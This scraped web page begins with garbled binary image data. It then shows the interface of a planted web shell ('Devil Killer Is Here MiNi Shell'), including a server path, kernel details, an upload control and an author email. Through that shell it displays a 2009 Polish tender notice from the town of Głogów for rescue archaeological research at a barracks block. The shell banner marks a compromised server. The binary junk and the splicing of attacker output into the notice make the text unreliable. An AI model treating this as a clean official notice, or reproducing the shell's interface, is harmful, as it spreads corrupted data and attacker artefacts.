JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/168857-N-2009.html

<p class="kh_header"><b>Głogów: Wykonanie w ramach zadania Rewitalizacja bloku koszarowego przy ulicy Szkolnej w Głogowie ratowniczych badań archeologiczno - architektonicznych .</b><br>
<b>Numer ogłoszenia: 168857 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie w ramach zadania Rewitalizacja bloku koszarowego przy ulicy Szkolnej w Głogowie ratowniczych badań archeologiczno - architektonicznych ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres zamówienia określa projekt badań oraz kalkulacja ofertowa kosztów badań archeologiczno - architektonicznych   i przedmiar wykonania zabezpieczenia wykopu przed osunięciem i zapadnięciem od strony ulicy Szkolnej i ogrodzenia terenu objętego badaniami- załączniki do niniejszej specyfikacji.

Istotne informacje dotyczące przedmiotu zamówienia:

1.	Badania archeologiczno - architektoniczne winny być prowadzone zgodnie                    z Rozporządzeniem Ministra Kultury z dnia 9.06.2004r. Dziennik Ustaw Nr 150 poz.1579.

2.    Zamawiający wymaga aby pozyskane w trakcie badań archeologicznych  
    zabytki przekazane były do Muzeum Archeologiczno - Historycznego w Głogowie
    z siedzibą przy ulicy  Brama Brzostowska 1, 67 - 200 Głogów 
3.	Zabytki metalowe powinny być poddane konserwacji w Pracowni Konserwacji
     Zabytków udzielającej 10 letniej gwarancji na wykonaną konserwację.
4.	Podczas realizacji robót należy przestrzegać zasad gospodarki odpadami 
      zgodnie  z obowiązującymi w tym zakresie przepisami, a w szczególności 
      obowiązującą ustawą o odpadach  z 27 kwietnia 2001r. ( Dz. U. Nr 39, poz. 251 
      z 2007  z późn. zmianami).
5.	Wymagane jest dokonanie  wizji  lokalnej na terenie gdzie będą realizowane  
       roboty przy udziale inspektora nadzoru Zamawiającego. Protokół z wizji 
       podpisany przez strony winien być dołączony do oferty. 
6.	Podczas realizacji badań należy zachować szczególną ostrożność ze względu na możliwość wystąpienia na terenie objętym badaniami niewybuchów. Zamawiający pokryje koszt zabezpieczenia odnalezionych niewybuchów. 
7.	Do wyliczeń należy przyjąć odwóz ziemi z wykopu na wysypisko w Biechowie wraz z kosztami jej składowania.
8.	Zamawiający we własnym zakresie dokona wycinki drzewostanu i krzewów  kolidujących z badaniami.
9.	Na wykonawcy ciąży obowiązek powiadamiania Wojewódzkiego Konserwatora
     Zabytków o rozpoczęciu i zakończeniu badań, odbiorach częściowych 
     i końcowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.24.50-4, 71.35.19.14-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 2600,-zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	Spełniają wymogi art. 22 ust. 1 ustawy pzp
2)	Nie podlegają wykluczeniu na podstawie art. 24 ust.1 i 2 ustawy pzp
3)	Wykonali w okresie pięciu lat roboty , a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, odpowiadające swym rodzajem robotom stanowiącym przedmiot zamówienia. Zamawiający za robotę podobną uzna  robotę polegającą na wykonaniu roboty : badania archeologiczno - architektonicznego o wartości brutto nie mniejszej niż100.000,00 zł .
4)	Dysponują osobami  posiadającymi uprawnienia  do:
-	kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej w zakresie niezbędnym do wykonania zamówienia + zaświadczenie w sprawie zezwoleń na prowadzenie prac konserwatorskich przy zabytkach i archeologicznych prac wykopaliskowych oraz posiadającymi aktualne  o przynależności do OIIB,
5)	Posiadają środki finansowe w wysokości co najmniej 100.000,00 zł lub zdolność kredytową w wysokości co najmniej 100.000,00 zł .
6)	Posiadają ubezpieczenie działalności od OC,
7)	Udzielą 10 - letniej gwarancji na wykonaną konserwację ewentualnych zabytków pozyskanych w trakcie badań archeologicznych.
8)	Dołączą do oferty zapewnienie Muzeum Archeologiczno - Historycznego w Głogowie o odbiorze ewentualnych zabytków pozyskanych w trakcie prowadzonych badań archeologicznych.

Podstawą do uzyskania ww. zapewnienia będzie zawarcie umowy z Muzeum Archeologiczno - Historycznym w Głogowie, której projekt stanowi załącznik                Nr  9 do SIWZ
Zamawiający dokona oceny spełnienia warunków na podstawie oświadczeń i dokumentów na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> .   Formularza ofertowego - zał. Nr 1 do SIWZ.
   2.   Protokółu z wizji na obiekcie objętego zamówieniem potwierdzony przez inspektora  
         nadzoru Zamawiającego.
3.	opracowaną kalkulację ofertową kosztów badań archeologiczno - architektonicznych i kosztorys ofertowy wynikający z przedmiaru wykonania zabezpieczenia wykopu przed osunięciem i zapadnięciem od strony ulicy Szkolnej i ogrodzenia z któreych wynika cena wykonania zamówienia.   
4.	Harmonogramu rzeczowo - finansowych w układzie miesięcznym   
Na etapie zawierania umowy Zamawiający zastrzega sobie możliwość dokonania aktualizacji harmonogramu rzeczowo - finansowego.
  
  Uwaga !
Wykonawca ma prawo stosować przy wycenie poszczególnych pozycji przedmiaru
kalkulację własną.
5.	Dowodu wniesienia  wadium.
6.	Zapewnienie Muzeum Archeologiczno - Historycznego w Głogowie o odbiorze ewentualnych zabytków pozyskanych w trakcie prowadzonych badań archeologicznych.
7.	Aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Zaświadczenie o wpisie do ewidencji działalności gospodarczej musi posiadać adnotację właściwego organu wydającego to zaświadczenie o aktualności zapisów - dokonaną w terminie jak wyżej.
8.	Pełnomocnictwo udzielone jednemu z partnerów, przez pozostałych wykonawców, do reprezentowania ich w przedmiotowym postępowaniu albo reprezentowaniu                            w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, w przypadku wykonawców wspólnie ubiegających się o niniejsze zamówienie.
9.	Oświadczenia o spełnieniu warunków udziału w postępowaniu w trybie art.22 pzp -   zał. Nr 2 do SIWZ,
10.	Dokumentów stwierdzających, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, - zgodnie z załącznikiem Nr 4 do SIWZ 
11.	Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego  oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające odpowiednio, że  wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na  raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
12.	Informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebność personelu kierowniczego w okresie ostatnich 3-ch lat, a w przypadku gdy okres      prowadzenia działalności jest krótszy - w tym okresie - zał. Nr 4 do SIWZ.
13.	Wykazu osób lub pisemne zobowiązanie innych podmiotów do udostępnienia osób        zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby        którymi będzie dysponował i które  będą uczestniczyć w wykonywaniu zamówienia         wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych  do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - zał. Nr 4 do SIWZ, 
14.	Informacja nt. części zamówienia jakie wykonawca zamierza powierzyć  podwykonawcom- zał. Nr 5 do SIWZ.
15.	Wykazu wykonanych robót budowlanych  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem  i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie,- zał. Nr 3 do SIWZ,
16.	Informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym  wykonawca posiada rachunek, potwierdzający wysokość  posiadanych środków  finansowych w wysokości co najmniej 100.000,00 zł. lub zdolność kredytową      wykonawcy na kwotę co najmniej  100.000,00 zł. wystawiona  nie wcześniej  niż  3  miesiące przed upływem terminu składania ofert,
        17.  Polisy, a w przypadku jej braku innego dokumentu  potwierdzającego, 
               że  wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
                      prowadzonej działalności,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Rynek 10 67-200 Głogów pok.314.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 09:00, miejsce: Urząd Miejski Rynek 10 67-200 Głogów pok.125.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com